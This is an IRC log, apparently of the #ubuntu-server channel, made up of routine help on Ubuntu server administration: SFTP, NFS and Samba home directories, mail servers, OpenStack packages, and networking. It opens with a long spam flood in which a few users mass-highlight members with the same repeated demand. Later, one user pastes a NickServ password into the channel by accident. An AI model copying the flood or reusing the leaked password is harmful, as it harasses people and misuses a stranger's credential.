<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: aluria
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: pmn
<elky> genii: +r
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Odd_Bloke
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: profall
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: kirkland
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: _ruben
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: iNs
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: StathisA
<justuy> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: niedbalski
<justuy> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: zioproto
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: M3mphiZ
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: jjohansen
<justuy> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: njbair
<justuy> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: jgornick
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: knopwob
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Raboo
<justuy> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: dnegreira
<justuy> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: mollerup_
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: clayton
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Dmitrii-Sh
<justuy> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: lfrlucas
<justuy> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: niedbalski
<no_leee> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: dpb1
<no_leee> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: fyxim
<genii> \/mode +r
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: jamespage
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: mike-zal
<justuy> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: zioproto
<justuy> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: sipior
<no_leee> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: codedmart
<no_leee> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Fuchs
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: X-Rob
<lanft> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: tlaxkit
<justuy> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: pitastrudl
<nacc> yeah
<justuy> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: LostSoul
<benimx> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: droman0
<benimx> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: logan-
<no_leee> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: rcj
<no_leee> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: StathisA
<justuy> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: compuguy
<benimx> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: Nizumzen
<benimx> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: bradm_
<justuy> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: MystaMax
<no_leee> #UBUNTU CAN YOU PLEASE ANSWER MY QUESTION ABOUT GETTING TOR BROWSER AS DEFAULT!!: tlaxkit
<pitastrudl> why not just set to auth only?
<elky> it is now
<Fuchs> and there I pondered adding sigyn for a few minutes
<genii> Fuchs: Hah
<shodan45> IRC is fun
<mike-zal> wow, I won't log in here the next time ;P. hopefully this boot will be off till time along with auth
<mike-zal> never saw such thing on irc before :P
<genii> You must have never been in #freenode then
<elky> Fuchs: we can -r and let her feed if you want :)
<mike-zal> I am using it since 2 years
<Fuchs> elky: it's fine
<genii> work, afk
<Fuchs> elky: any idea which user got triggered this time?
<mike-zal> and I never bother to register my nick because usually there is no issues, no auth
<nacc> the user was inn #ubuntu with an offensive nick, was give some help, they wanted to do something that i'm not sure is possible, got mad
<elky> Fuchs: yes, the one with the racial slur in the name
<monokrome> spammers are evil
<ducasse> elky: that's the one, yes - he wanted help with tor browser
<ogra_> genii, do you have power in #ubuntu-desktop too ?
<genii> unfortunately not
<genii> They should update the access list to allow #ubuntu namespace ops
 * keithzg bets that the spammer hasn't even actually filled out the desktop app survey :P
<kebbanalex_> Hello! Was wondering if there is a way to basicly stripe 2 partitions but that the LVM splits the files inbetween the partitions so you could mount 1 of the partitions on another pc to access some (about half if same size) of the data?
<kebbanalex_> Essentially splitting complete files inbetween the partitions
<superboot> kebbanalex_: I would guess that that would have to be done at the file system level. since anything lower than that would only see data.  I wonder if BTRFS has something like this? I would look at features of different filesystem to see if there is a match to your needs.
<sarnold> i've never seen any filesystem or block layer ever advertise any feature of the sort
<sdeziel> a union FS maybe?
<kebbanalex_> I guess I'll just stripe the two drives eventho I'll loose partial recovery
<sarnold> sigh. pity he lfet before finding out that he'd lose the entire filesystem.
<superboot> sarnold: Yes. Maybe he'll relize that the stripes don't know anything about the filesystem...
<manjo> meet @6:30 in the lobby for team dinner
<superboot> Is tehre a conference I'm not at?
<superboot> Haha
#ubuntu-server 2017-09-29
<lordievader> Good morning
<zioproto> hello ubuntu folks
<zioproto> my monitoring system is not happy because of these errors in kern.log https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1705447
<ubottu> Launchpad bug 1705447 in linux (Ubuntu Zesty) "misleading kernel warning skb_warn_bad_offload during checksum calculation" [Medium,Fix released]
<zioproto> this happens on Bare Metal
<zioproto> I guess I can safely ignore them ... is anyone else hitting this stuff ?
<jamespage> coreycb: https://bugs.launchpad.net/ubuntu/+source/horizon/+bug/1677207 seem familiar to you? I'm not sure our flush cache/upgrade bits are working in the horizon pacakges.
<ubottu> Launchpad bug 1677207 in horizon (Ubuntu) "dashboard not workable after upgrade from newton to ocata" [High,Confirmed]
<zioproto> good... some Ocata bugs are popping up before I start my upgrade :)
<coreycb> jamespage: ah, is it memcache do you think?
<hehehe> hey hey
<hehehe> if I am making new sftp user - chrooting it to images directory and using strong password is all that I need?
<hehehe> :)
<hehehe> just a user who can upload images via www :D
<jamespage> coreycb: I don't think so
<hehehe> Match Group sftp_users - whats that for ?X11Forwarding no   AllowTcpForwarding no ChrootDirectory /images
<hehehe> ok I see whats up
<hehehe> :)
<hehehe> its to catch users to whom following commands apply
<hehehe> however in my cases, dirs are owned by root:www-data lol
<hehehe> can I use Match user somehow instead of a group?
<hehehe> so I add 1 more user to www-data group :)
<hehehe> mm anyhow now I see that entire path have to be root:root
<hehehe> but my php app required group write read access
<hehehe> via group
<rbasak> nacc: "debian/changelog must exist in source packages"
<rbasak> Looks like that's only just become a requirement.
<rbasak> Interesting for us.
<nacc> rbasak: where is that?
<rbasak> nacc: lastest Debian policy change.
<rbasak> Sent to devel-debian-announce
<nacc> rbasak: ah
<nacc> rbasak: I mean, beyodn perhaps adding it to the linter, what do you expect to chagne?
<rbasak> nacc: I mean that we're assuming that it exists when importing historical packages.
<rbasak> But I suppose if it did in practice, then we're OK. Hence interesting rather than a problem.
<nacc> rbasak: ah ok
<nacc> rbasak: yeah, I think we just would't see any versiosn
<nacc> rbasak: which would mean orphans
<nacc> perhaps we'd fail to tag too
<nacc> not sure
<nacc> rbasak: is your schedule pretty full today, or do you think you'll be able to get to ay of the reviews?
<rbasak> nacc: seems unlikely, sorry. Do you have any small ones you can point out that I can try to tackle when I find a few minutes here and there?
<nacc> rbasak: no it's fine, just gauging my own expectations
<lol768> https://help.ubuntu.com/community/UFW states that "By default, UFW allows ping requests"
<lol768> the minute I do an "ufw enable", I can no longer ping6 the server, or ping6 out from it
<nacc> rbasak: the only one that definitively you need to review is the queue change
<nacc> rbasak: was cjwatson's suggestion that we add a Git-Ubuntu: field to the DSC?
<nacc> rbasak: i see dgit adds a Dgit
<drab> hello .o/
<sarnold> hey drab :)
<drab> I'm considering doing something "different" for our centralized home dirs and hoped to hear some opinions
<drab> basically right now we have a standard ldap + nfs shares, users auth against ldap and pam_mount mounts their homedir
<drab> however as I've been moving stuff to containers nfs is a pita becuase the userspace version is awfully slow and the kernel version won't run in a container
<drab> there's also the problem that a network blip and/or issue with the nfs server freezes up the clients very badly
<drab> I've read that may be fixed using soft rather than hard mounts with nfs tho
<drab> in any case, as I was trying to help some folks with a samba share, I came across some links wondering if I could use samba for homedirs...
<drab> it turns out there's some largish university campuses doing homedirs on samba as it can be interoperated with windows too, but generally I've not seen a lot of setups like that and wondered how crazy of an idea it is
<nacc> i mean, i'd expect to see some similar caveats a la network blips
<nacc> i'm not sure how resilient samba is to long outages
<sarnold> soft mounts definitely help nfs clients
<drab> I've no experience with samba so wondering if: a) is it performing alright compared to nfs? (will test of course) 2) is it crazy to put homedirs on it coupled with ldap?
<nacc> and/or how it reconciles remote changes onn the server
<nacc> drab: +1 on soft, though
<drab> tbh the most appealing part of this is avoiding to run kvm so that I can run nfs-kernel-server
<drab> right now I'm 99% lxc with the exception of the nfs server, requiring kvm
<drab> and that means handing off the infra to people requires them to know how to deal with that too which isn't terribly hard but does add some complications
<drab> so if I could be 100% lxc using samba for homedirs that would be, in the larger picture, quite a win
<drab> but I don't want of course to ruin it for all the users by making their experience terrible
<nacc> drab: in theory, could your VM be a privileged container?
<drab> nacc: the thing is, that doesn't really solve the isolation issue... I've had nfs locking up on the server and taking down the whole thing
<nacc> drab: ah sure
<nacc> drab: yep, i can see that happening :)
<drab> so even if I could do a privileged containres, which I guess would solve having kvm
<nacc> yeah, if you need isolation, then that's a different issue
<drab> I don't quite feel comfortable given everything else going on on that box
<nacc> yep
<drab> yeah, but you're right, that would solve my kvm issue
<sarnold> drab: are you sure the samba mounts _would_ be allowed?
<nacc> drab: nfs lockinng up in the kernel?
<drab> nacc: yes, basically locking up the machines, doing something bad to the drives, whatever
<drab> ending up impacting all the other containers/services on that box
<drab> sarnold: based on what I read, it looks like it. this is the best link so far:
<drab> https://sites.duke.edu/linux/cifs-nfs-homes/
<drab> so it seems the workflow is the same
<drab> except it uses pam_cifs
<drab> altho right now I'm using autofs to mount the homes, not even pam_mount
<drab> but that should also work with samba no prob
<drab> except that samba requires user/pwd so maybe pam is required in this workflow
<drab> the added benefit to using samba over nfs is auth
<sarnold> drab: btw i've had success unsticking nfs mounts by bringing up the IP address of the server on an interface, exporting an identically-named filesystem, and umounting
<drab> good to know, thanks for sharing
<drab> I guess I'll take it as a good sign that neither of you called me crazy and begin experimenting :)
<drab> that will give me a better sense, the general principle seems fairly simple/standard, I just have no clue how well samba is going to handle disconnections or multiple logins (sometimes ppl forget to log out and their home stays mounted)
<nacc> ahasenack: --^ has also been doing quite a bit to get samba up to snuff relative to bug reports
<nacc> he may have further insights
<drab> that's another pretty annoying this I found no good solution to... log people out after inactivity
<drab> ok, cool, thanks
<drab> always good to be here, you guys are great :)
<sarnold> drab: check out systemd-logind for the idle thing.
<drab> k, thanks
<drab> brb
<sarnold> my own experience with samba is decades ago at this point but I recall being massively annoyed at how many bloody authentication types there are. public, share-level security, user auth, etc etc
<sarnold> but if you get to run the server and clients and control them yourself you can probably get something happy
<coreycb> beisner: hi, can you please promote horizon 3:11.0.3-0ubuntu3~cloud0 to ocata-proposed? it's a high-priority fix for upgrade from newton->ocata.
<beisner> hi coreycb - on that ^
<coreycb> beisner: cheers, thanks
<drab> sarnold: nacc: fwiw found this which seems possibly problematic: https://github.com/lxc/lxd/issues/3442
<drab> but stgraber says he has it working so maybe I'm misunderstanding the issue
<nacc> drab: do you use zentyal?
<drab> I only need to serve files, not even the DC part, altho it'd be nice to do that later
<drab> I don't , but it didn't seem zentyal specific, maybe I misread
<drab> the problems seemed to be related how samba stores the acls in the security.* namespace
<nacc> drab: zentyal sets the --use-xattrs bits
<nacc> drab: but not really sure either
<nacc> i'd try it and see :)
<drab> heh, I'm setting stuff up nowish, had to deal with some broken hardware and building sorting box frames
<drab> the "fun" part of being a charity is that we hold on whatever junk we can get our hands on for the rainy days
<drab> it's like a flashback 20yrs in my father's garage...
<drab> I don't think he ever threw away a single screw, everything had to come off before the boards ended up in the bin
<nacc> that's how my dad was too
<nacc> i had one of his boxes of screws until it got rained
<nacc> somehow he kept it totally organized by type, size, thread, etc. too
 * drab nods
<drab> I think the first tool I was every introduced to was a labelling machine :P
<nacc> heh
<drab> now that it's up to me I just write with sharpies on masking tape lol :P
<nacc> yeah, that's what we do in our pantry, e.g. :)
<stgraber> drab: the xattrs stuff is configurable IIRC and my DC is deployed manually through samba-tool, so I'm simply not passing that particular option
<drab> stgraber: sounds good, thanks for chiming in
<drab> stgraber: any chance you have an opinion on the craziness of replacing nfs+ldap with samba+ldap for centralized homedirs for a bunch of linux desktops?
<stgraber> I haven't done either in a while. I used to do that kind of stuff for school districts in a previous life and I seem to remember both being annoying but in different ways :)
<nacc> heh
<drab> yep, that's exactly where I am... edu charity/school and being annoyed :P
<stgraber> IIRC we'd usually do nfs on trusted networks where no sharing was needed with Windows and cifs for the rest
<drab> I guess testing will tell... getting to it
<drab> yeah, I'd normally do that if it wasn't that I'm trying to get everything into containers
<drab> and nfs-kernel-server won't play nice with it and still be a nuisance to the host if I go with a privileged container
<drab> samba would solve that problem, which is quite a plus in this setup
<stgraber> yeah, and the old nfs-user-server wasn't exactly fun to use :)
<drab> yap
<Village> Hello,
<Village> what's best SMTP server is on ubuntu 16.04?
<Village> Where you can chnge ports?
<nacc> Village: 'best' is a really ... vague ... term to use. I would think every SMTP server worth using is configurable as to what port it listens onn.
<nacc> Village: which have you looked at?
<Village> I want that Internet Site can send emails via SMTP and email addresses sender by not same..
<Village> now i looking
<Village> postfix
<drab> postfix is good
<drab> postfix and exim are 2 of the common ones and largely a matter of taste which one you pick
<drab> personally exim would drive me bonkers each time I tried to configure it and always stuck with postfix, but really it's just a personal preference thing
<drab> Village: ^^
<Village> Ok, i have at mind that two of best is postfix and exim
<Village> but i wanna know google smtp not allow send user@gov.us ?
<drab> why do you think it does not?
<Village> i don't know need try
<oerheks> make sure you leave a copy on your gov.us server :-D
#ubuntu-server 2017-09-30
<Village> I have question, i install photo gallery software and aree issue
<Village> when i try paste commnet and is checked that when someone paste comment i have to email letter
<Village> so when i try paste commant i get
<Village> Errors posting comment:
<Village> PHPMailer failed to send [Gallery] Comment posted
<Village> ErrorInfo:Could not execute: /usr/sbin/sendmail -t -i
<Village> issue is ErrorInfo:Could not execute: /usr/sbin/sendmail -t -i
<Village> so how can i make that execute could be to /usr/sbin/sendmail -t -i
<Village> ?
<hallyn> so..   artful...  new installer?  how do we feel that's going for us, hmmm?
<hallyn> do we feel we have feature parity, in terms of diagnosing a failed install?
<Village> Hm, i don't know i imagine that some user cant reach because forbbiden that directory
<Village> actually now i look at ftp that file does not exist
<Village> sendmail
<Village> It's must be default by ubuntu 16.04 or need install any package?
<Village> or it's must be installed with gallery software?
<hallyn> smoser: rharper: does artful server cd image mess with the login credentials?  (after a cdinstall I can't seem to login with my user/pwd)
<Village> i found that need get it by
<Village> sudo apt-get install sendmail
#ubuntu-server 2017-10-01
<k2gremlin> Anyone ever play around with PnumaticCraft Advanced Air Compressor? Trying to play with gelid Cry but it keeps turning to stone lol
<k2gremlin> wrong server
<lol768> o/
<lol768> I have a systemd user unit
<lol768> Fails with "systemd[482]: znc.service: Failed at step GROUP spawning /usr/local/bin/znc:"
<lol768> http://paste.ubuntu.com/25654998/
<lol768> status=216/GROUP
<lol768> it's a valid group
<lol768> turns out removing the user and group fixes it..
<lol768> no idea why
<zertyui> hello there
<zertyui> i got 2 servers running on linux, the first one with 2 network interface the second one with one network interface
<zertyui> the second server communicate with his LAN @IP but can not access to internet
<zertyui> the first server able to access internet and to the LAN
<zertyui> how to give access to internet on the second server ?
#ubuntu-server 2018-09-24
<cpaelzer> good morning
<freephile> good morning :-)
<freephile> cpaelzer
<cpaelzer> hi freephile!
<lordievader> Good morning
<linuxperia> Hi all. I have a small problem with courier on my ubuntu server and dont know how to fix the problem. I get always this error message here => "authdaemond: marker line not found in /etc/courier/authmysqlrc (probably forgot to run sysconftool after an upgrade)" I had a broken upgrade and it looks like that courier is now somehow stuck. i am not able to login to my mail on my ubuntu server. Thanks in advance for any helpfull tip how to resolve
<linuxperia> this problem.
<Ussat> any splunk users here ?
<Ussat> on Ubuntu ?
<zioproto> coreycb: are you here ? I have a an error message that prints your name in it :)
<zioproto> we recently upgraded libvirt on staging to go to Ocata. We have some scripts that do stuff like 'virsh list --all'
<zioproto> now if I log in into an hypervisor the command works as expected
<zioproto> if I do from a jump host "ssh hypervisor virsh list --all"
<zioproto> I get an empty table
<zioproto> and the hypervisor logs the following 4 lines:
<zioproto> https://www.irccloud.com/pastebin/uy0Xehoy/
<coreycb> zioproto: i would guess that the user that you're running the ssh command as doesn't have the proper access
<nacc> cpaelzer: i put what debugging i coudl in the git-ubuntu bug you found. It is a bug, probably due to some indirect dependency changing (but not sure on that).
<wtflux> hi all i just installed ubuntu server 18.04.1 LTS and im trying to restart the networking service can anyone instruct me which command to use? ifupdown is not installed, service networking restart isnt either
<nacc> wtflux: well, i did tell you waht to do in #ubuntu -- you just need to do some reading
<wtflux> was that before or after you said to "seek guidance in #ubuntu-server" ?
<nacc> wtflux: in the same line.
<Ussat> google is your friend
<linuxperia> hi all. after upgrading my ubuntu server to 18.04 my courier mail server makes problem. i get in the logs always this message here => "imapd-ssl: /etc/courier/shared/index: Permission denied" How can i fix this ?
<nacc> linuxperia: did check said file's permissions?
<linuxperia> nacc: yes i did both group and user is root
<nacc> linuxperia: that's ownership, not permissions.
<nacc> linuxperia: and what user is courier running as?
<linuxperia> nacc: ahhh huh well thgis is the output of ls -la "-rw-r--r-- 1 root root       0 Dez 14  2010 index" looks like it never worked till yet but was ignored as i just today activated tls
<nacc> linuxperia: right, if courier is trying to write to it, that would fail unless run as root, etc.
<linuxperia> let me check the user running courier
<linuxperia> nacc: looks like imapd-ssl is run as vmail
<nacc> linuxperia: so it depends on if it's reading or writing. I assume writing based upon the error, but hard to say.
<linuxperia> yes will try add vmail to the user and chmod the file. i tweaked the config i guess that is why vmail tries to write to the file
<nacc> linuxperia: could be, i don't know, sorry
<linuxperia> nacc: thanks a lot for your helpfull assistance. i could make the error message dissapear. lets see if i get my ubuntu mail server configured with lets encrypt certificate
<nacc> linuxperia: nice, np
<hallyn> smoser: hey, you should know this - long ago there were restrictions on the kernel you put on an aws ami image, so 4.14.65-serge1 would not work.  do you know if those still exist?
#ubuntu-server 2018-09-25
<rbasak> ahasenack: I stole your weekend triage slot. Hope that's OK.
<zioproto> coreycb: with the same user if I login to the shell via ssh, and then I give the command, everything works fine
<zioproto> it should make no difference in doing 'ssh host command' or in logging actually in and then giving the command
<tobias-urdin> coreycb: another upgrade bug if you don't mind checking ubuntu pkg
<tobias-urdin> https://bugs.launchpad.net/neutron/+bug/1794259
<ubottu> Launchpad bug 1794259 in neutron "rocky upgrade path broken requirements pecan too low" [Undecided,New]
<tobias-urdin> https://review.rdoproject.org/r/#/c/16439/ for ref
<tobias-urdin> coreycb: another friendly reminder to make sure you populate /etc/cinder/resource_filters.json
<coreycb> tobias-urdin: for pecan the min version possible to pick up for rocky is 1.2.1 (bionic version) so I think we're good there
<coreycb> tobias-urdin: checking on /etc/cinder/resource_filters.json. i'm not sure i'm familiar with the issue there.
<tobias-urdin> coreycb: this is the bug atleast dont know which version it's solved https://github.com/pecan/pecan/issues/96
<tobias-urdin> coreycb: some more info the resource_filters.json file https://review.rdoproject.org/r/#/c/16448/
<tobias-urdin> just wanted to let you know so you could be sure its installed by the deb pkg
<coreycb> tobias-urdin: ah looks like we do need to force 1.3.2 min version for pecan
<coreycb> tobias-urdin: i'll fix that. very much appreciate you letting me know. as always!! :)
<tobias-urdin> no worries :)
<coreycb> tobias-urdin: btw i think these sort of issues aren't hit with apt dist-upgrade which is what our tooling uses
<tobias-urdin> coreycb: yeah, the RDO package testing did exactly the same which is why my ansible-based upgrade toolbox catches them since
<tobias-urdin> its rolling upgrades it upgrades some parts at a time
<coreycb> tobias-urdin: got it. makes sense.
<blackroot> Has anyone here tried to setup openstack on a single workstation? Like this guide here tells you: https://www.ubuntu.com/openstack/install
<coreycb> blackroot: i should be able to point you in the right direction. having problems with anything in particular?
<blackroot> coreycb: yes, a few things. first i should tell you that the machine is a 1U DELL PE with 16gb ram and dual xeon cpu. it has dual NIC aswell
<blackroot> Using a fresh install of ubuntu 18.04
<blackroot> i follow the short guidance in the link i posted
<blackroot> except i additionally have to snap install juju
<blackroot> when i have both NIC's (dhcp) to a switch, i can't get past bootstrapping. But when i disconnect the eno2 before ubuntu install, i can get past that and to the package deployment. which doesn't work, until i connect eno2 to the switch again. then it fails during deployment
<blackroot> which i can't figure out
<blackroot> it starts the deployment, but fails after a while
<blackroot> 2018-09-25 14:14:14,853 [WARNING] conjure-up/openstack-novalxd - juju.client.connection: connection.py:227 - Receiver: Connection closed, reconnecting
<coreycb> blackroot: are you using conjure-up?
<blackroot> yeah
<coreycb> yes obviously, sorry :)
<coreycb> blackroot: ok probably going to want to get some logs but let's move the conversation to #conjure-up on freenode
<dxc> hi folks
<dxc> Just upgraded to ubuntu 18.04 server
<dxc> wanted to know how I can remove a couple lines from my MOTD on login
<dxc> https://paste.ubuntu.com/p/pMPxwKk7dH/ I want to remove the read about ubuntu updates line, the having fun line, and the highly secure kiosk line
<rbasak> dxc: edit /etc/default/motd-news
<coreycb> tobias-urdin: i have new cinder and neutron packages on their way for rocky to address the issues you brought up
<dxc> ty rbasak
<dxc> o7
<tobias-urdin> coreycb: cool, nice work :)
<coreycb> tobias-urdin: np thanks again :)
<burton_> hi can anyone help me with postfix sendmail is listening in the port but not postfix and i have removed it
<teward> burton_: start by running: sudo service sendmail stop
<teward> if that doesn't work just reboot the server, if sendmail is truly gone it won't exist to start up
<teward> or find the sendmail pids and issue `sudo kill -9` to the sendmail pids.
<burton_> still got the issue listenning to port 25 it says sendmail:MTA
<burton_> can anybody help me its listening to master now but i still have a lil problem
<burton_> burton_ SET PASSWORD m00nlights
<blackflow> hoo hoo!
#ubuntu-server 2018-09-26
<wr> ubuntu server minimal iso size?
<cpaelzer> good morning (or whatever applies to you)
<lordievader> Good morning
<smoser> hallyn: it wasnt "restrictions". but we had a ec2 specific kernel just because it was vastly different
<smoser> since then we moved to just using the -virtual subset of the -generic kernel and all was happy.  to my knowledge -virtual should still work and is supported.
<smoser> but... we since moved on to again having a -ec2 "optimized" version.  i'm not sure or convinced of the value of the optimization.
<smoser> net summary: there isn't really anything "special" needed for ec2
<rdkr> hi, i am trying to install server 18 alongside an existing windows install. the installer is not showing me the partition i created for the install. is there some way of doing this in particular? i created the partition with fdisk as a 'linux partition'. cheers!
<mustmodify> Ubuntu Server 16.04 + pantheon(gui?) worked fine. Upgrade to 18.04 and my machine is putting itself to sleep on some small interval, like ... 30 min? I'm also experiencing some odd networking issues on boot. Power settings changed to "never sleep." syslog: https://gist.github.com/mustmodify/11a6afdc20b25a31928e3d7abe1d08b1
<mustmodify> Syslog blames NetworkManager! I found a StackOverflow post saying I may need to update my kernel. Typically that just happens on its own. How can I force a kernel update and/or recompile if latest?
<mustmodify> Well, I tried some things. We'll see if this issue is resolved.
<mustmodify> But seriously, there's still something wrong with my networking. Check out these entries from syslog. Seems bad. https://gist.github.com/mustmodify/cc49021d0d4ed79295223a86e741b878
<hallyn> smoser: well the specific question i had,
<hallyn> was whether i can use any release name i want (uname -r)
<hallyn> there are older docs claiming you can't,
<hallyn> i've found no newer docs saying "we fixed that", but it seems hard to believe that something like 4.4.109-centos1 would not work
<smoser> you should be able to, yes. for hvm. and i think pvm also
<hallyn> smoser: the other error i've seeon someone mention is about multiple /etc dirs
<hallyn> i've got multiple LVs which each have a rootfs, but of course they are not bootable
<smoser> right. so... the import failure that you're seeing i can't speak to. it sounded from tych0 that you weren'te even getting to boot the thing
<smoser> but rather some improt processs was just complaining about that.
<tych0> right, we're not
<tych0> yep.
<tych0> you mentioned htere's a way to push raw bytes and boot them without using the import process?
<smoser> there might be some more fancy ways at this point.
<smoser> but what we initially did (and I believe still do) is basically
<smoser>  a.) launch an instance
<smoser>  b.) attach a volume
<smoser>  c.) dd bytes to volume
<smoser>  d. detach volume
<smoser>  e.) register ami with that volume as root
<hallyn> d'oh.  that sounds deceptively simple
<hallyn> thanks smoser !
<tych0> heh, ok :)
<smoser> i think there might be some sugar around that now
<smoser> (possibly which you're already using)
<tych0> well, the sugar is causing us problems, so this trick is much appreciated
<smoser> i thought there migh tbe some less-sugar alterntiave.. somethinb asically like "create volume from blob"
<smoser> all the above wrapped up without you required to have a instance to do it.
<tych0> smoser: i guess one complicating factor is that we have two disks
<hallyn> i prefer raw paths
<smoser> conceptually i think it would be the same, but i've never registered such a ami myself.
<hallyn> tych0: why would that complicate things?
<tych0> hallyn: because multi-disk support seems relatively recent
<tych0> i've found various docs referring to multiple disks not being supported
<tych0> but the official docs say it is now
<hallyn> 14:53 < smoser> right. so... the import failure that you're seeing i can't speak to. it sounded from tych0 that you weren'te even getting to boot the thing
<hallyn> I had no idea what order steps were done in :)
<hallyn> (s/had/have/)
<hallyn> which is why i prefer the raw route - i hate magic hidden behind cloud services
<elfranne> I am seing packet drops on ethtool ... it is packet drop counter ? or per second ? can t find any info on that ....
<tych0> man hthey really do not like ubuntu on this launch dialog
<teward> rbasak: when did we add nginx to the nginx-server seeds?
<teward> s/nginx-server/ubuntu-server/
<teward> *is tired*
<rbasak> teward: years ago? I don't have a date. Look in bzr blame perhaps?
<teward> rbasak: i must have forgotten heh
<teward> rbasak: probably was once we got it included in Main, which was 2014 iirc
<teward> just waiting on beta freeze to end so the latest round of upstream bugfixes gets included (1.15.4)
<rbasak> teward: right - that's _how_ it ended up in main. Something has to pull it in - in our case it was one of the server seeds.
<teward> indeed.  all's good, i just forgot :|
<teward> (i'm a bit overworked recently, guess I forgot WHOOPS)
<mustmodify> Just a ping -- would love some help with my networking issue.
<teward> mustmodify: i'd look at the network infrastructure rather than your computer
<teward> since it looks like it's just not getting a DHCP reply
<mustmodify> Hunh, ok thanks.
<teward> mustmodify: or, connect to another network and see if it still works
<mustmodify> I wonder how it gets an IP address then
<teward> static?
<teward> in any case your logs show a DHCP request went unack'd by any DHCP servers
<mustmodify> sure. I'll dig into that, thanks. Would that explain a 5 minute wait during startup
<teward> so lines 3-4, then 16-20.
<mustmodify> with the description "waiting for service to start"
<teward> yep
<mustmodify> ok
<teward> the fact it keeps retransmitting (lines 16-20) indicates that it's not getting a return ACK
<teward> which it needs to complete DHCP
<mustmodify> Final Q: Any clue why this started when I upgraded from 16 to 18?
<mustmodify_> teward: What about this one? It just happened again, hours later. Server apparently put to sleep by NetworkManager ?
<mustmodify_> https://gist.github.com/mustmodify/11a6afdc20b25a31928e3d7abe1d08b1
<teward> that I don't know about, but i can't tell whether NM is actually calling the suspend or not
<mustmodify_> It's a huge mystery.
<teward> (it might be receiving a notice that the system is going to sleep, in which case that explains that, but to my knowledge NM doesn't have direct access to call a suspend)
<mustmodify_> Is there some log other than syslog that might give details about what caused the suspend?
<nacc> https://askubuntu.com/questions/1005507/network-manager-requested-to-sleep-every-30-minutes-wifi-drops
<nacc> mustmodify_: --^ check your regular power settings
